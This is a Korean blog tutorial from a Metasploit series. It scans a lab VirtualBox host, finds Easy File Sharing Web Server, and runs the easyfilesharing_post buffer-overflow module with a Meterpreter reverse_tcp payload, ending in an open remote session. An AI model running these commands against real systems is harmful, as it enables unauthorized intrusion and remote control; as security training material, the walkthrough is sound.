[MAD-METASPLOIT] 0x20 - Remote Exploit

HAHWUL auxiliary(vnc_login) > db_nmap -PN 192.168.56.101 [] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2017-08-07 15:17 KST [] Nmap: Nmap scan report for 192.168.56.101 [] Nmap: Host is up (0.00072s latency). [] Nmap: Not shown: 983 closed ports [] Nmap: PORT STATE SERVICE [] Nmap: 80/tcp open http [] Nmap: 135/tcp open msrpc [] Nmap: 139/tcp open netbios-ssn [] Nmap: 443/tcp open https [] Nmap: 445/tcp open microsoft-ds [] Nmap: 554/tcp open rtsp [] Nmap: 2869/tcp open icslap [] Nmap: 5357/tcp open wsdapi [] Nmap: 5500/tcp open hotline [] Nmap: 5800/tcp open vnc-http [] Nmap: 5900/tcp open vnc ..snip..

nmap 결과 중 80(일반적인 웹) 포트에 대해 체크가 필요해보입니다.

HAHWUL > services

Services

host port proto name state info —- —- —– —- —– —- 192.168.56.101 23 tcp telnet filtered 192.168.56.101 80 tcp http open
192.168.56.101 135 tcp msrpc open
192.168.56.101 137 udp netbios open HAHWUL:<00>:U :WORKGROUP:<00>:G :HAHWUL:<20>:U :WORKGROUP:<1e>:G :WORKGROUP:<1d>:U : MSBROWSE :<01>:G :08:00:27:69:14:ff 192.168.56.101 139 tcp netbios-ssn open
192.168.56.101 443 tcp https open
192.168.56.101 445 tcp microsoft-ds open
192.168.56.101 554 tcp rtsp open
192.168.56.101 2869 tcp icslap open
192.168.56.101 5357 tcp wsdapi open
192.168.56.101 5500 tcp hotline open
192.168.56.101 5800 tcp vnc-http open
192.168.56.101 5900 tcp vnc open VNC protocol version [3, 4].8 192.168.56.101 10243 tcp unknown open
192.168.56.101 49152 tcp unknown open
192.168.56.101 49153 tcp unknown open
192.168.56.101 49154 tcp unknown open
192.168.56.101 49155 tcp unknown open
192.168.56.101 49156 tcp unknown open

NSE를 활용해서, 좀 더 자세하게 정보를 얻어보니..

HAHWUL > db_nmap –script=default -p 80 192.168.56.101 [] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2017-08-07 15:19 KST [] Nmap: Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan [] Nmap: NSE Timing: About 99.07% done; ETC: 15:20 (0:00:00 remaining) [] Nmap: Nmap scan report for 192.168.56.101 [] Nmap: Host is up (0.00051s latency). [] Nmap: PORT STATE SERVICE [] Nmap: 80/tcp open http [] Nmap: |_http-title: Login - powered by Easy File Sharing Web Server [] Nmap: MAC Address: 08:00:27:69:14:FF (Oracle VirtualBox virtual NIC) [] Nmap: Nmap done: 1 IP address (1 host up) scanned in 19.94 seconds

Easy file Sharing Web server를 사용하고 있네요. 해당 서버는 공개 취약점이 어느정도 존재하는 서버이고, 관련해선 검색해보시면 많이 나올거라 생각됩니다.

바로 Metasploit을 통해 찾아봅니다.

HAHWUL > search easyfilesharing

Matching Modules

Name Disclosure Date Rank Description —- ————— —- ———– exploit/windows/ftp/easyfilesharing_pass 2006-07-31 average Easy File Sharing FTP Server 2.0 PASS Overflow exploit/windows/http/easyfilesharing_post 2017-06-12 normal Easy File Sharing HTTP Server 7.2 POST Buffer Overflow exploit/windows/http/easyfilesharing_seh 2015-12-02 normal Easy File Sharing HTTP Server 7.2 SEH Overflow

현재까지 기준으론 3개가 나오네요. 셋다 Overflow 취약점으로 원격에서 쉘 획득이 가능하죠. 맘에드는 것 하나를 골라준 후..

HAHWUL > use exploit/windows/http/easyfilesharing_post HAHWUL exploit(easyfilesharing_post) > show options

Module options (exploit/windows/http/easyfilesharing_post):

Name Current Setting Required Description —- ————— ——– ———– RHOST yes The target address RPORT 80 yes The target port (TCP)

Exploit target:

Id Name – —- 0 Easy File Sharing 7.2 HTTP

세팅을 시작합니다.

HAHWUL exploit(easyfilesharing_post) > set RHOST 192.168.56.101 RHOST => 192.168.56.101 HAHWUL exploit(easyfilesharing_post) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp HAHWUL exploit(easyfilesharing_post) > set LHOST 192.168.56.101 LHOST => 192.168.56.101 HAHWUL exploit(easyfilesharing_post) > set LPORT 4646 HAHWUL exploit(easyfilesharing_post) > show options

Module options (exploit/windows/http/easyfilesharing_post):

Name Current Setting Required Description —- ————— ——– ———– RHOST 192.168.56.101 yes The target address RPORT 80 yes The target port (TCP)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description —- ————— ——– ———– EXITFUNC thread yes Exit technique (Accepted: ‘’, seh, thread, process, none) LHOST 192.168.56.100 yes The listen address LPORT 4646 yes The listen port

Exploit target:

Id Name – —- 0 Easy File Sharing 7.2 HTTP

Exploit 을 하게되면..

HAHWUL exploit(easyfilesharing_post) > exploit -z

[] Started reverse TCP handler on 192.168.56.100:4646 [] Sending stage (956991 bytes) to 192.168.56.101 [] Meterpreter session 1 opened ( 192.168.56.100:4646 -> 192.168.56.101:38258) at 2017-08-07 15:24:33 +0900 [] Session 1 created in the background. HAHWUL exploit(easyfilesharing_post) > sessions -l

Active sessions

Id Type Information Connection – —- ———– ———- 1 meterpreter x86/windows HAHWUL\Virtualbox @ HAHWUL 192.168.56.100:4646 -> 192.168.56.101:38258 (192.168.56.101)

meterpreter shell이 sessions 로 들어왔습니다. 정상적으로 공격에 성공한거지요.

HAHWUL exploit(easyfilesharing_post) > sessions -i 1 [*] Starting interaction with 1…

meterpreter > meterpreter >

이러한 형태로 Remote Exploit이 가능합니다.

Reference

https://www.exploit-db.com/exploits/39661/